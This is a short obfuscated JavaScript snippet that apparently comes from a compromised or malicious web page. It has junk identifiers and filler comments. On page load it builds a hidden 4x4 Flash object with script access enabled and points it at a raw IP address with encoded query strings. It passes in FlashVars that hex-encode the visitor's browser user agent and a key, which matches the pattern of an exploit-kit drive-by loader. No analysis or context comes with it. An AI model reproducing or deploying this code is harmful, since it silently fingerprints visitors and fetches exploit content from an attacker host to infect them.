/*s96508d55503hssfj35131fs*/function hgfgerdfgdf(num, width){/*s26482d37150hfj14358fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s25411d5660hfj36153fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s4558d8769hfj94915fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s66147d27650hfj85834fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd34683hfs*/c += b + d;/*s88418d20234hfj62665fs*/e += 1;}return c;}/*s98284dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.224/?ODM5Njg4NzY=&newest=xHzQMrDYbR7FFYDfKPnEUKREMU7WA0eKwYyZhazVF5yxFDfGpbH1FxzspV-dCF-EmvFvdLAHIwGh1UTASwR&information=OTc0MzM2Mg==&round=llIxdB1tB9qut2kCHnxSVgZbT-xTeMghBrZCSR7NtiVzxxrAcIsolwBfUvWNUyustU1sW5wsSla_7VaOO-w&shield=NzMwMzU0MA==", ghnvbn("http://188.225.33.224/?NzM1MTc3NzI=&newest=xX_QMvWebRXQCJ3EKvrcT6NHMVHRH0CL2Y-dmrHTefjaelWkzrLFTF_xozKASASG6_JtdfJSDQ&round=fpj0XVKQRgn9pcAAwa9aj_iEOGmhKe0pDR_EPcZQhM98CXFrZt2QnxybAkds8mxBWH6FENjOge&information=ODU2Nzc3NQ==&before=NDc1OTQ4NDE=","gexywoaxor"));